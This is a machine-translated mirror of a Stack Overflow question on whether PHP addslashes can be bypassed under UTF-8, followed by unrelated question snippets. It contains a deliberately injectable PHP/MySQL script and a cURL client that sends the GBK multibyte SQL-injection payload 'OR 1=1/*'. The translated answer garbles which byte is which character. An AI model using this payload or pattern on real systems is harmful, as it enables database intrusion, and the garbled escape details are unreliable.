个人中心
文章发布
退出
作者热门文章
- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
24
4
我试图验证在脚本上使用 addlashes 是否可利用,众所周知,不应使用 addlashes,但问题是,它是否总是可利用的?
我在两种情况下发现了大量关于滥用加斜杠的信息 当字符集不是 utf8 时 (使用双字节转换)以及 当变量被 ""括起来时
那么,当上述情况均未发生时,可以绕过 addlashes 吗?这是我一直在测试的代码:
带有 db 转储的 data.sql 文件:
CREATE TABLE IF NOT EXISTS `test` (
`user` varchar(25) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
INSERT INTO `test` (`user`) VALUES
('admin'),
('user');
mysql -u test -ptestpw test < data.sql
<?php
//Server script the receives content via post
mysql_connect("localhost","test","testpw");
mysql_select_db("test");
$user=addslashes($_POST['username']);
$query="SELECT * FROM test WHERE user='".$user."'";
$q=mysql_query($query) or die (mysql_error());
$num_rows = mysql_num_rows($q);
echo "Listed rows: $num_rows";
if ($num_rows > 0) {
$a=mysql_fetch_array($q);
print_r($a);
}
?>
<?php
//Client script crafting the special url
$url = "http://example.com/index.php";
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_POST, TRUE );
curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" .
chr(0xbf) . chr(0x27) .
"OR 1=1/*&submit=1" );
$data = curl_exec( $ch );
print( $data );
curl_close( $ch );
?>
最佳答案
addslashes 通过在前面加上 " 来转义字节 0x00(NUL 字节)、0x22(')、0x27(\)和 0x5c(\)到它。有记录的案例,其中 addslashes fails with the character encoding GBK on MySQL :
This type of attack is possible with any character encoding where there is a valid multi-byte character that ends in 0x5c, because
addslashes()can be tricked into creating a valid multi-byte character instead of escaping the single quote that follows. UTF-8 does not fit this description.
关于php - 使用 utf 和单引号时可以绕过加斜杠吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/16565189/
24
4
0
这是一个复杂的查询,我希望用一条语句实现它,而不是必须在 PHP 中处理数组值。 要达到预期的输出: User Jobs Total John D. 5 $1245.67 Ma
SELECT B. * , SC.cate_name, ( CASE WHEN special_offer_type = 'Fixed Value' THEN B.price - special_o
关于将 booksleeve 与 protobuf-net 结合使用,我有一些相当基本的问题。现在我已经实现了一个单例类来管理连接,所以我多次重复使用与 recommended 相同的连接。 .现在我
我想要一个客户端加/减系统,用户可以单击加号,值会增加 1,减号,值会减少 1,该值永远不应该低于零,并且应该从 0 开始.有没有办法在 jquery 中简单地做到这一点?所有 jquery 插件都会
我正在使用加号和减号按钮更新我的产品数量,这很有效,但我的问题是因为我在一个容器中有多个产品,它正在更新所有产品的数量。这是代码:
我需要在大小相等的小整数数组上做大量简单的代数运算。这些操作仅包括三种:(i) 添加数组和 (ii) 按元素减去数组,以及 (iii) 比较一个数组中的所有元素是否不小于/大于另一个数组中的对应元素。
我对 javascript 很陌生,但我需要一种 JS 方式来在单击按钮时增加/减少输入字段中的值。我已成功将值设置为显示 0,但当我单击“添加”按钮时,它不会增加。 以下是 html 和 JS 代码
我可以在输入字段中添加/减去一个数字。 但是,我希望结果显示在中而不是在input中字段。 我尝试使用innerHTML自己完成它但无法让它发挥作用。 $(function() { $('.min
我的页面上有一个加号/减号 jquery 选择器。当页面加载或数字达到 1 时,我希望减号按钮变灰以模拟非事件状态。这是我的代码和 fiddle https://jsfiddle.net/pgxvhs
我如何加/减用户输入的十六进制数? 喜欢: basehex = input() sechex = input() sum = hex(basehex - sechex) print(sum) 我得到:
本文实例讲述了python简单实现矩阵的乘,加,转置和逆运算。分享给大家供大家参考,具体如下: 使用python完成矩阵的乘,加,转置和逆: ?
我输入的一些文本包括几个上下箭头(↑ 和 ↓),以及一个加号/减号 (±)。 这些特殊字符以 HTML ASCII 输入:↑ ↓ ±。在 POST 上,HTML 在保存到 MySQL 表之前使用 ht
我正在尝试配置 Live Gamer Portable 2 Plus 的输出引脚以降低帧速率。通过 GraphStudioNext,我可以通过捕获引脚访问配置并更改帧速率。 但是,当我通过 API 在
我正在尝试使用批处理文件创建任意时间。我试图从我的代码中减去设置值(例如1天,1个月和2000年),以显示系统时间减去前面所述的设置值。对于小时和分钟,我要减去10小时和10分钟(在代码中显示为不同的
我想建立一个 5 位向上/向下计数器。当我能让模拟工作时,我会更乐意购买零碎的东西来构建它。到目前为止,我使用的是 ATmega8,但坦率地说,只要组件相当便宜,任何解决方案都适合我。 我在网上找到了
使用 ng-repeat 时在数字输入字段上添加加/减切换的最佳方法是什么 我这样试过,但没用: - + vm.plus = f
我正在尝试弄清楚如何将 UNION 与相同的 JOIN 一起使用,而不是陷入 #2014 - 命令不同步。 我创建了四个简单的表格并为它们编写了简化的代码。主要想法是获得名字中带有“最佳”字样的每把剑
这个问题已经有答案了: Is floating point math broken? (33 个回答) 已关闭 9 年前。 我有一个简单的函数,应该生成 1000 个不同的元素: var start
我目前正在编写一个响应式设计,我正处于移动导航折叠的地步。 为此,我创建了两个 div 和一个 ul。 ul 包含我的 nav 元素,而 div 将显示移动设备和平板电脑下拉菜单的导航图像。 HTML
我为 woocommerce 单个产品页面创建了一个加/减数量按钮。创建了一个新的数量-input.php " min="" max="" name="" value="" ti
我是一名优秀的程序员,十分优秀!